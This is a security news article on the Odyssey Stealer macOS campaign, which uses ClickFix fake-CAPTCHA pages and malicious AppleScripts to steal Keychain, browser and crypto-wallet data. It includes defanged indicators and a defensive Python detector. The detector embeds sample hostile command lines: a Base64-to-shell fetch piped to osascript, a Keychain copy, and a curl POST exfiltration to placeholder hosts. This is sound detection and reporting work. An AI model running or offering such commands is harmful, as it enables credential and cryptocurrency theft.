Threat Actors Use Clickfix Tactics to Deploy Malicious AppleScripts for Stealing Login Credentials

In a recent discovery by the CYFIRMA research team, a sophisticated malware campaign dubbed Odyssey Stealer has been uncovered, targeting macOS users through a deceptive method known as Clickfix tactics.

This campaign leverages typosquatted domains (malicious websites mimicking legitimate ones such as the macOS App Store, finance platforms, or cryptocurrency news portals) to trick users into executing harmful AppleScripts (osascripts).

Figure: macOS App Store domain

These scripts are engineered to harvest sensitive data, including browser cookies, saved passwords, cryptocurrency wallet information, and browser extensions, posing a severe threat to individuals, particularly those engaged in financial and crypto activities.

Odyssey Stealer Targets macOS Users

The operation, linked to a command-and-control (C2) panel primarily hosted in Russia, showcases a professional-grade data theft mechanism that prioritizes Western users in the United States and the European Union while avoiding victims in CIS countries, a pattern often associated with Russian-aligned cybercriminal groups.

The Clickfix technique begins with the creation of visually similar or typosquatted domains designed to exploit user typing errors.

Upon visiting these malicious sites, users are greeted with a fake Cloudflare-style CAPTCHA prompt, accompanied by instructions to copy and paste a Base64-encoded command into their terminal.

According to Cyfirma, this command fetches and executes a non-obfuscated osascript from servers like odyssey1[.]to or specific IP addresses, triggering a cascade of malicious activities.

Figure: osascript

Finance and Crypto Enthusiasts at High Risk

The script creates a temporary directory, such as /tmp/lovemrtrump, to store stolen data, copies macOS Keychain files for credential theft, and deploys fake authentication prompts to capture user passwords.

It further targets desktop cryptocurrency wallets like Electrum, Coinomi, and Exodus, alongside browser data from Chrome, Firefox, and Safari, extracting private keys, seed phrases, session tokens, and personal files from Desktop and Documents folders.

The stolen data is then compressed into a ZIP file (out.zip) and exfiltrated via a curl POST request to attacker-controlled servers, with persistent retry mechanisms ensuring delivery even under intermittent network conditions.
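A defender-side way to surface this chain in process telemetry, added here as an example and not code from the CYFIRMA report: each rule below maps to one stage described above (Base64 blob piped into a shell, remote script piped into osascript, Keychain copy into /tmp, ZIP sent out with a curl POST), and any inline Base64 token is decoded so the hidden second-stage command is inspected as well. The sample events, the /tmp directory contents and the 203.0.113.10 address are constructed placeholders, not the campaign's real infrastructure.

```python
import base64
import re

# Constructed process-execution records, shaped like what an EDR or a macOS
# unified-log query returns for a ClickFix chain; none of this is real telemetry.
# 203.0.113.10 is a documentation-range placeholder, not the campaign's C2.
_STAGE2 = "curl -fsSL http://203.0.113.10/s.scpt | osascript"
SAMPLE_EVENTS = [
    "ls -la /tmp",
    'echo "%s" | base64 -d | sh' % base64.b64encode(_STAGE2.encode()).decode(),
    "mkdir -p /tmp/lovemrtrump",
    "cp /Users/alice/Library/Keychains/login.keychain-db /tmp/lovemrtrump/",
    'curl -X POST -F "file=@/tmp/lovemrtrump/out.zip" http://203.0.113.10/gate',
    "git status",
]

# One behaviour rule per stage of the chain described in the write-up.
RULES = {
    "clickfix_base64_to_shell": re.compile(
        r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:sh|bash|zsh|osascript)\b"),
    "remote_script_to_osascript": re.compile(r"curl\b.*https?://.*\|\s*osascript\b"),
    "keychain_copy_to_tmp": re.compile(
        r"\b(?:cp|ditto)\b.*Library/Keychains/.*\s/(?:tmp|private/tmp)/"),
    "zip_exfil_via_curl_post": re.compile(
        r"curl\b.*(?:-X\s*POST|-F\s|--data|-d\s).*\.zip\b"),
}
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _decoded_payloads(cmd):
    """Yield printable decodings of Base64-looking tokens embedded in cmd."""
    for tok in _B64_TOKEN.findall(cmd):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # path fragments and non-Base64 runs land here
        if text.isprintable():
            yield text


def scan_events(events):
    """Return (rule_name, command_line) hits, also checking decoded Base64."""
    hits = []
    for cmd in events:
        # Run the rules on the raw line and on whatever it decodes, so the
        # stage-two command hidden inside the pasted blob is matched too.
        for candidate in [cmd, *_decoded_payloads(cmd)]:
            for name, rx in RULES.items():
                if rx.search(candidate):
                    hits.append((name, cmd))
    return hits


if __name__ == "__main__":
    for name, cmd in scan_events(SAMPLE_EVENTS):
        print(f"[{name}] {cmd[:80]}")
```

On the constructed sample the pasted Base64 line produces two hits, one for the decode-to-shell pattern and one for the curl-to-osascript command recovered from the blob.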

Odyssey Stealer, a rebranded evolution of Poseidon Stealer and a fork of the AMOS Stealer, demonstrates advanced capabilities in the macOS malware-as-a-service ecosystem.

Its control panel offers attackers a structured interface to manage infected devices, customize malware builds, and hijack browser sessions using stolen cookies.

The malware’s focus on over 100 browser extensions, particularly cryptocurrency-related ones like MetaMask, underscores its intent to maximize financial gain.

To combat this threat, organizations and individuals must adopt robust endpoint security solutions, implement threat intelligence, and configure firewalls to block known malicious IPs and domains.

Continuous network monitoring, behavior-based anomaly detection, and security awareness training are critical to mitigating risks from such social engineering attacks.

As Odyssey Stealer continues to evolve under the suspected maintenance of “Rodrigo,” a key figure behind Poseidon and AMOS, vigilance and adaptive defenses remain paramount.

Indicators of Compromise (IoC)

Indicator                                                          Remarks
-----------------------------------------------------------------  -----------------
appmacosx[.]com                                                    Malicious domain
financementure[.]com                                               Malicious domain
cryptoinfo-news[.]com                                              Malicious domain
odyssey1[.]to                                                      Odyssey C2 Panel
45[.]135.232.33                                                    Odyssey C2 Panel
a0bdf6f602af5efea0fd96e659ac553e0e23362d2da6aecb13770256a254ef55   AppleScript
